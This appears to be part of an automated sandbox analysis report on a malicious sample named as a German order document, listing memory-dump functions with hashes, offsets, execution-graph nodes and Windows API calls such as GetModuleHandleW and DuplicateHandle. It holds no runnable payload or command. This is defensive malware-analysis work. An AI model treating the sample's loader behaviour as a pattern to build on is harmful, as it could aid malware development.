                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Bf*}
                                                                            • API String ID: 0-500971921
                                                                            • Opcode ID: ff9264590135a125fe5c23a50161693fd191cd0da12fa1af712861c1722ebd49
                                                                            • Instruction ID: 558655f2dbc62716b35138f8a870fed47d627e581861dcaa117461b502a1dc9d
                                                                            • Opcode Fuzzy Hash: ff9264590135a125fe5c23a50161693fd191cd0da12fa1af712861c1722ebd49
                                                                            • Instruction Fuzzy Hash: 04514032A0C3865FC705CB788952BAEBFB19F86340729C4ABD445DB252C635DE06E792
                                                                            Function 05043940 Relevance: .3, Instructions: 315COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dae918bf3dd46b11f79db54f6077340db2861c569888bc26fe522177eec76002
                                                                            • Instruction ID: eb9ac5a86ee26817cd58adadf85fd053806cfec72897319ed48d5f7becaafe97
                                                                            • Opcode Fuzzy Hash: dae918bf3dd46b11f79db54f6077340db2861c569888bc26fe522177eec76002
                                                                            • Instruction Fuzzy Hash: 1B1270B04117498EE732EF65EC4C5893AB1BB85318F90430BD2E16A2E9DBBE154BDF44
                                                                            Function 09808B20 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78e98bef8457e2f0c72ff6d34060c9754660c0614a8c23db41915adff9139297
                                                                            • Instruction ID: 56ef8114c20a9f37be168ee3f962a2c36d2c596b1b317d8a463a190f8dbb66a0
                                                                            • Opcode Fuzzy Hash: 78e98bef8457e2f0c72ff6d34060c9754660c0614a8c23db41915adff9139297
                                                                            • Instruction Fuzzy Hash: 0FE10974E002198FDB54DFA9C9909AEFBB2FF89304F248169D415A7395D731AD82CF60
                                                                            Function 09809F28 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 45101be4876d90cdaa87d9972d77043d1298b369e607004cae0103e6f059c53b
                                                                            • Instruction ID: 61fe0e907992e632d8ed33ded13d8595cb18d8b36b468ec0785bf27c6090b545
                                                                            • Opcode Fuzzy Hash: 45101be4876d90cdaa87d9972d77043d1298b369e607004cae0103e6f059c53b
                                                                            • Instruction Fuzzy Hash: E7E1F674E002198FDB18DFA9C9949AEFBB2FF89304F248169D415AB395D731AD42CF60
                                                                            Function 0980A360 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca6f851c8ca22a89d1ad88eea27f86739b6e2442ebf87233471a0c06e6da569e
                                                                            • Instruction ID: 0300e847e512a22a8aad830fada723767ef5d452057cb51a35bb97f8b1c82db6
                                                                            • Opcode Fuzzy Hash: ca6f851c8ca22a89d1ad88eea27f86739b6e2442ebf87233471a0c06e6da569e
                                                                            • Instruction Fuzzy Hash: AEE10974E002198FDB18DFA9C9949AEFBB2FF89304F248159D455A7395D730AD42CF60
                                                                            Function 098082B0 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e085842318d5b9895b584a3411b5ff19aff2f06009010c0e07eae0d497af9251
                                                                            • Instruction ID: fe12248aa1bdd9a7c33c069c3e1cbea16083210b8bcceac38a0bed136f5ac80d
                                                                            • Opcode Fuzzy Hash: e085842318d5b9895b584a3411b5ff19aff2f06009010c0e07eae0d497af9251
                                                                            • Instruction Fuzzy Hash: 9DE1E874E002198FDB14DFA9C990AAEFBB2FF89305F248169D415A7395D731AD82CF60
                                                                            Function 098086E8 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 214ebe09f65f86268f71c7e838b24d23af1728a457e8e0cde47f886a5ccb1775
                                                                            • Instruction ID: c61f5813648507639e07742a6f7cdb4d028c0647e008618777e89d234f2b287b
                                                                            • Opcode Fuzzy Hash: 214ebe09f65f86268f71c7e838b24d23af1728a457e8e0cde47f886a5ccb1775
                                                                            • Instruction Fuzzy Hash: E0E11974E002198FDB14DFA9C990AAEFBB2FF89304F248169D415A7395D731AD82CF61
                                                                            Function 0504E859 Relevance: .3, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5c446257b0af0dce425b440c7894da78f030dd985f0c7890b3d6d37450756b2
                                                                            • Instruction ID: cb01d0e7313018a7991b840cabb56a1cf2aaf7cd1eedba1387173930c82bc917
                                                                            • Opcode Fuzzy Hash: d5c446257b0af0dce425b440c7894da78f030dd985f0c7890b3d6d37450756b2
                                                                            • Instruction Fuzzy Hash: 65D1273481075A8ADB10EBA8D950AE9B7B5FFD5300F10CB9AE14937211FB746EC5CB91
                                                                            Function 0504E82F Relevance: .3, Instructions: 267COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e566ebb8c625bdb3f74f6c10f2b35f8c70c64de05dd58e3d332ba834d22f537
                                                                            • Instruction ID: 5b177fe827a3722e60493d7ee7cb9764391a0b23c708eb38d3d30c30364bdbf8
                                                                            • Opcode Fuzzy Hash: 2e566ebb8c625bdb3f74f6c10f2b35f8c70c64de05dd58e3d332ba834d22f537
                                                                            • Instruction Fuzzy Hash: 00D1183491075A8ADB10EBA8D950AE9B7B1FFD5300F108B9AD1493B221FB746EC5CB91
                                                                            Function 05040F94 Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cef4881a50cfa725c6f8964c340e3facca60d635a57f41c580eac3e5b7e4384
                                                                            • Instruction ID: f3e42775e137ea203e9e5d43b3802003b4885953496be2c243368833a0f66dcc
                                                                            • Opcode Fuzzy Hash: 3cef4881a50cfa725c6f8964c340e3facca60d635a57f41c580eac3e5b7e4384
                                                                            • Instruction Fuzzy Hash: 04A18D76B002098FCF05DFA4D9449EEB7B2FF88300B15457AE906AB225DB76E946CF40
                                                                            Function 0504E868 Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3fcec45561444ed2f1fcb6b4edebe632af3a0281142b6ed8626b7a0c25250599
                                                                            • Instruction ID: 16668b27ef20ebd5279126a8b1063d85a320fbafeb5a5f50ce57d22d3fc88d90
                                                                            • Opcode Fuzzy Hash: 3fcec45561444ed2f1fcb6b4edebe632af3a0281142b6ed8626b7a0c25250599
                                                                            • Instruction Fuzzy Hash: B2D1163481075A8ADB10EBA8D950AA9B7B5FFD5300F10CB9AE14937221FB746EC5CB91
                                                                            Function 00FC29C8 Relevance: .3, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83d60d23d0db9545fd9487a46fbf5fb82b31313853691d91b8bcc37c7dd4e515
                                                                            • Instruction ID: c444960b024396363eb27746d209980761e2c51f48883556127aa8ba301d9d27
                                                                            • Opcode Fuzzy Hash: 83d60d23d0db9545fd9487a46fbf5fb82b31313853691d91b8bcc37c7dd4e515
                                                                            • Instruction Fuzzy Hash: 78911872608342CFC355CB29CA96B567BB1FF86310B15889FD096CF6A1D634DC06EB52
                                                                            Function 05043930 Relevance: .2, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cbc860c966249f9df9f70784a596a7eac4bcc490fcc80ce8a5c5f7d91d81639
                                                                            • Instruction ID: 20b8471162f920468f338ebb21da444ed1027e42dc9bf98569dbd958beab6019
                                                                            • Opcode Fuzzy Hash: 3cbc860c966249f9df9f70784a596a7eac4bcc490fcc80ce8a5c5f7d91d81639
                                                                            • Instruction Fuzzy Hash: 38C1F5B08117498FE732EF69EC4C58A7BB1BB85314F50430BD1A16B2E8DBBA144ADF44
                                                                            Function 098086D8 Relevance: .1, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a54513fbe8e69228e9f5fcdbe913f981beafa8f55cbf9217a0d0554b1f80d3b0
                                                                            • Instruction ID: 724646dd3f72acdcf47f91ac8e9dc3656314303774b1199391f0c7a322d2bf15
                                                                            • Opcode Fuzzy Hash: a54513fbe8e69228e9f5fcdbe913f981beafa8f55cbf9217a0d0554b1f80d3b0
                                                                            • Instruction Fuzzy Hash: 72510770E002198FDB18DFA9C9916AEFBF2FF89304F248169D418AB355D7359942CFA0
                                                                            Function 09808B10 Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f1ea92268c62c5c0d53db2687eb9d6acf15a6dfbfed549e45c7c6fa931c563ff
                                                                            • Instruction ID: 06dea983699335837b439bdfa699c0a86a5e7a8eaccd2e5ac02fb1b4ec923f10
                                                                            • Opcode Fuzzy Hash: f1ea92268c62c5c0d53db2687eb9d6acf15a6dfbfed549e45c7c6fa931c563ff
                                                                            • Instruction Fuzzy Hash: 03510870E002198FDB54CFA9C9905AEFBB2FF89304F248169D418AB355D7359E82CF60
                                                                            Function 00FC36C0 Relevance: .1, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b782e980284e3dd40b87ac00471ac588797f57e8f64513a9ce709ea335a129e
                                                                            • Instruction ID: 93d202d0ce7cfae6c521bce64542ff24089370002858a70596537ff54383d6f9
                                                                            • Opcode Fuzzy Hash: 6b782e980284e3dd40b87ac00471ac588797f57e8f64513a9ce709ea335a129e
                                                                            • Instruction Fuzzy Hash: 3041A776E1425A8FCB00CF98CA82B69FBB5FF4C280B15C42AD415EB351C634CA01EB51
                                                                            Function 00FC2B81 Relevance: .1, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b3985b12fa89db4a2a0711c8281c3c19a1baf31c8504ceeb2cc251722da7095d
                                                                            • Instruction ID: aea6e74105c46944d939843de9dd136d717ffceaeeb77e09bb46a477a9c91dab
                                                                            • Opcode Fuzzy Hash: b3985b12fa89db4a2a0711c8281c3c19a1baf31c8504ceeb2cc251722da7095d
                                                                            • Instruction Fuzzy Hash: FC41C172A14607CFC794CF69CA82B6AB7F1FF84310B14886AE15ACBA60D334ED40DB41
                                                                            Function 00FC2B90 Relevance: .1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2347b26ed4354ed37eb73138f2c719ce7409a1c416f4d81b0b384740e187156e
                                                                            • Instruction ID: b1a9d25443892a21f44281882c15fb0ff9ab7b23580b9be4f20016611d4987a9
                                                                            • Opcode Fuzzy Hash: 2347b26ed4354ed37eb73138f2c719ce7409a1c416f4d81b0b384740e187156e
                                                                            • Instruction Fuzzy Hash: 9F41B172A106078FC794CF69CA82B6AB7F5FB84310F24886AE15ACB660D634ED51DB41

                                                                            Execution Graph

                                                                            Execution Coverage:7.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:96
                                                                            Total number of Limit Nodes:10
                                                                            execution_graph 15813 16d4668 15814 16d4669 15813->15814 15819 16d6de0 15814->15819 15817 16d4704 15820 16d6e05 15819->15820 15828 16d6edf 15820->15828 15832 16d6ef0 15820->15832 15821 16d46e9 15824 16d421c 15821->15824 15825 16d4227 15824->15825 15840 16d8560 15825->15840 15827 16d8806 15827->15817 15830 16d6ee4 15828->15830 15829 16d6ff4 15829->15829 15830->15829 15836 16d6414 15830->15836 15833 16d6ef5 15832->15833 15834 16d6414 CreateActCtxA 15833->15834 15835 16d6ff4 15833->15835 15834->15835 15837 16d7370 CreateActCtxA 15836->15837 15839 16d7433 15837->15839 15839->15839 15841 16d856b 15840->15841 15844 16d8580 15841->15844 15843 16d88dd 15843->15827 15845 16d858b 15844->15845 15848 16d85b0 15845->15848 15847 16d89ba 15847->15843 15849 16d85bb 15848->15849 15852 16d85e0 15849->15852 15851 16d8aad 15851->15847 15853 16d85eb 15852->15853 15854 16d9ed1 15853->15854 15857 16ddf70 15853->15857 15861 16ddf60 15853->15861 15854->15851 15858 16ddf91 15857->15858 15859 16ddfb5 15858->15859 15865 16de120 15858->15865 15859->15854 15862 16ddf64 15861->15862 15863 16ddfb5 15862->15863 15864 16de120 KiUserCallbackDispatcher 15862->15864 15863->15854 15864->15863 15866 16de12d 15865->15866 15867 16de166 15866->15867 15869 16dc464 15866->15869 15867->15859 15870 16dc469 15869->15870 15872 16de1d8 15870->15872 15873 16dc498 15870->15873 15872->15872 15874 16dc4a3 15873->15874 15875 16d85e0 KiUserCallbackDispatcher 15874->15875 15876 16de247 15875->15876 15879 16de2c0 15876->15879 15877 16de256 15877->15872 15880 16de2ee 15879->15880 15881 16de3ba KiUserCallbackDispatcher 15880->15881 15882 16de3bf 15880->15882 15881->15882 15883 16dbf08 15887 16dc000 15883->15887 15897 16dbff0 15883->15897 15884 16dbf17 15888 16dc005 15887->15888 15891 16dc034 15888->15891 15907 16daf60 15888->15907 15891->15884 15892 16dc238 GetModuleHandleW 15894 16dc265 15892->15894 15893 16dc02c 15893->15891 15893->15892 15894->15884 15898 16dc000 15897->15898 15899 16daf60 GetModuleHandleW 15898->15899 15902 16dc034 15898->15902 15900 16dc01c 15899->15900 15900->15902 15905 16dc689 GetModuleHandleW 15900->15905 15906 16dc698 GetModuleHandleW 15900->15906 15901 16dc02c 15901->15902 15903 16dc238 GetModuleHandleW 15901->15903 15902->15884 15904 16dc265 15903->15904 15904->15884 15905->15901 15906->15901 15908 16dc1f0 GetModuleHandleW 15907->15908 15910 16dc01c 15908->15910 15910->15891 15911 16dc698 15910->15911 15915 16dc689 15910->15915 15912 16dc699 15911->15912 15913 16daf60 GetModuleHandleW 15912->15913 15914 16dc6ac 15913->15914 15914->15893 15916 16dc694 15915->15916 15917 16daf60 GetModuleHandleW 15916->15917 15918 16dc6ac 15917->15918 15918->15893 15919 16d6540 15920 16d6545 15919->15920 15924 16d670f 15920->15924 15931 16d6720 15920->15931 15921 16d6673 15925 16d6788 DuplicateHandle 15924->15925 15929 16d6713 15924->15929 15928 16d681e 15925->15928 15928->15921 15935 16d611c 15929->15935 15932 16d6721 15931->15932 15933 16d611c DuplicateHandle 15932->15933 15934 16d674e 15933->15934 15934->15921 15936 16d6788 DuplicateHandle 15935->15936 15938 16d674e 15936->15938 15938->15921

                                                                            Executed Functions

                                                                            Function 016DC000 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: c20841aeca253f20beb56a1af964ce381f94d8b89cc2a2b61e872425735e281e
                                                                            • Instruction ID: 8ab9f9ca0c71d462bfb84ade095457bcf7c93cc03388b66759205a6691e17aba
                                                                            • Opcode Fuzzy Hash: c20841aeca253f20beb56a1af964ce381f94d8b89cc2a2b61e872425735e281e
                                                                            • Instruction Fuzzy Hash: 43716970A00B098FE724DF6AD84475ABBF6FF88600F008A6DD44AD7B40DB75E846CB94
                                                                            Function 016D670F Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 60 16d670f-16d6711 61 16d6788-16d681c DuplicateHandle 60->61 62 16d6713-16d671a 60->62 67 16d681e-16d6824 61->67 68 16d6825-16d6842 61->68 64 16d671c-16d6720 62->64 65 16d6721-16d6749 call 16d611c 62->65 64->65 70 16d674e-16d6774 65->70 67->68
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: c6d4ebaffe30ce920facd3a747ecf9d9efa3bde8d0cc4fd3365b22c70758582e
                                                                            • Instruction ID: f9ec3ff060cc9b59e8227ad773d21cf20eea915c817cb5044707a20b38a8c704
                                                                            • Opcode Fuzzy Hash: c6d4ebaffe30ce920facd3a747ecf9d9efa3bde8d0cc4fd3365b22c70758582e
                                                                            • Instruction Fuzzy Hash: C0414876900249AFCF11CF99D844ADEBFFAFB48320F15802AE914A7311D739A911DFA0
                                                                            Function 016D7364 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 75 16d7364-16d736e 76 16d7375-16d7431 CreateActCtxA 75->76 77 16d7370-16d7374 75->77 79 16d743a-16d7494 76->79 80 16d7433-16d7439 76->80 77->76 87 16d7496-16d7499 79->87 88 16d74a3-16d74a7 79->88 80->79 87->88 89 16d74a9-16d74b5 88->89 90 16d74b8 88->90 89->90 91 16d74b9 90->91 91->91
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 016D7421
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 5730307b7c98a3ddcbd98fd617c583a65e76073f3622dab69523931a8ae47306
                                                                            • Instruction ID: 6a6380c0c71a634397b4ca0c1581fe2521cacdf2b25d5f6c4e48af76a697799c
                                                                            • Opcode Fuzzy Hash: 5730307b7c98a3ddcbd98fd617c583a65e76073f3622dab69523931a8ae47306
                                                                            • Instruction Fuzzy Hash: 2C41BFB1C01719CFEB25CFAAC844B8EBBB5BF49704F24806AD408AB251DB756946CF91
                                                                            Function 016D6414 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 93 16d6414-16d7431 CreateActCtxA 97 16d743a-16d7494 93->97 98 16d7433-16d7439 93->98 105 16d7496-16d7499 97->105 106 16d74a3-16d74a7 97->106 98->97 105->106 107 16d74a9-16d74b5 106->107 108 16d74b8 106->108 107->108 109 16d74b9 108->109 109->109
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 016D7421
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 534f44fe2a225c74c6c72c907de8c9ad648162a705602be1ad3ce499b8af9c41
                                                                            • Instruction ID: 999982808ebc19d962e120323bfe6a91e92c7f7033b00d1761c424658b443220
                                                                            • Opcode Fuzzy Hash: 534f44fe2a225c74c6c72c907de8c9ad648162a705602be1ad3ce499b8af9c41
                                                                            • Instruction Fuzzy Hash: BC41C1B0C0171DCFEB25DFA9C844B9EBBB5BF48704F20806AD408AB251DB756946CF91
                                                                            Function 016D611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 111 16d611c-16d681c DuplicateHandle 114 16d681e-16d6824 111->114 115 16d6825-16d6842 111->115 114->115
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: af34765ef1ee23cc716540e605a254b5488b2fef1a87152546dc56caef00c0cc
                                                                            • Instruction ID: a76aafbf3978484491fc6aac1a68639f5ba9858c1c579f344161e8859fa30b50
                                                                            • Opcode Fuzzy Hash: af34765ef1ee23cc716540e605a254b5488b2fef1a87152546dc56caef00c0cc
                                                                            • Instruction Fuzzy Hash: 7821B5B5D002489FDB10CF9AD884ADEBBF9FB48310F15841AE954A7350D378A954CFA5
                                                                            Function 016D6780 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 118 16d6780-16d6781 119 16d67f8-16d681c DuplicateHandle 118->119 120 16d6783-16d67f5 118->120 121 16d681e-16d6824 119->121 122 16d6825-16d6842 119->122 120->119 121->122
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: acd0fa2d72248480fdbc05f4ee7eb2aadbbe40fe87d7069b685255e316c48c72
                                                                            • Instruction ID: d7cf47cba5e01e706786b97354d7657c94c63a1c28de7aa443d6c5dcb6d5da7e
                                                                            • Opcode Fuzzy Hash: acd0fa2d72248480fdbc05f4ee7eb2aadbbe40fe87d7069b685255e316c48c72
                                                                            • Instruction Fuzzy Hash: 6721E6B5D002489FDB10CF9AD884ADEBBF9FB48310F14841AE914A3350D378A940CF65
                                                                            Function 016DAF60 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 126 16daf60-16dc230 129 16dc238-16dc263 GetModuleHandleW 126->129 130 16dc232-16dc235 126->130 131 16dc26c-16dc280 129->131 132 16dc265-16dc26b 129->132 130->129 132->131
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016DC01C), ref: 016DC256
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
